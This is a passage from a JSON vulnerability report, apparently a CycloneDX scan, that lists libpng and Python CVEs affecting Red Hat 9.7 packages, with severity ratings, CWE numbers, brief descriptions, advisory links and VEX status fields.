          "url": "https://github.com/pnggroup/libpng/commit/55d20aaa322c9274491cda82c5cd4f99b48c6bcc"
        },
        {
          "url": "https://github.com/pnggroup/libpng/issues/836"
        },
        {
          "url": "https://github.com/pnggroup/libpng/issues/837"
        },
        {
          "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-6fr7-g8h7-v645"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2026/05/msg00017.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34757"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8251-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34757"
        }
      ],
      "published": "2026-04-09T15:16:11+00:00",
      "updated": "2026-05-09T11:16:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-12.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-3479",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        22
      ],
      "description": "DISPUTED: The project has clarified that the documentation was incorrect, and that pkgutil.get_data() has the same security model as open(). The documentation has been updated to clarify this point. There is no vulnerability in the function if following the intended security model.\n\npkgutil.get_data() did not validate the resource argument as documented, allowing path traversals.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3479"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3479"
        },
        {
          "url": "https://github.com/python/cpython/commit/5af6ce3e7b643a30a02d22245c1e3f4a8bc0a1fe"
        },
        {
          "url": "https://github.com/python/cpython/commit/bcdf231946b1da8bdfbab4c05539bb0cc964a1c7"
        },
        {
          "url": "https://github.com/python/cpython/commit/cf59bf76470f3d75ad47d80ffb8ce76b64b5e943"
        },
        {
          "url": "https://github.com/python/cpython/commit/d786d59a8f7196bb630100a869f28ad13436b59c"
        },
        {
          "url": "https://github.com/python/cpython/issues/146121"
        },
        {
          "url": "https://github.com/python/cpython/pull/146122"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/WYLLVQOOCKGK73JM7Z7ZSNOJC4N7BAWY/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3479"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3479"
        }
      ],
      "published": "2026-03-18T19:16:06+00:00",
      "updated": "2026-04-07T18:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-3644",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        20,
        116
      ],
      "description": "The fix for CVE-2026-0672, which rejected control characters in http.cookies.Morsel, was incomplete. The Morsel.update(), |= operator, and unpickling paths were not patched, allowing control characters to bypass input validation. Additionally, BaseCookie.js_output() lacked the output validation applied to BaseCookie.output().",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3644"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2026-10950.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/57e88c1cf95e1481b94ae57abe1010469d47a6b4"
        },
        {
          "url": "https://github.com/python/cpython/commit/62ceb396fcbe69da1ded3702de586f4072b590dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/d16ecc6c3626f0e2cc8f08c309c83934e8a979dd"
        },
        {
          "url": "https://github.com/python/cpython/issues/145599"
        },
        {
          "url": "https://github.com/python/cpython/pull/145600"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-3644.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-10950.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/H6CADMBCDRFGWCMOXWUIHFJNV43GABJ7/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3644"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3644"
        }
      ],
      "published": "2026-03-16T18:16:09+00:00",
      "updated": "2026-03-17T14:20:01+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
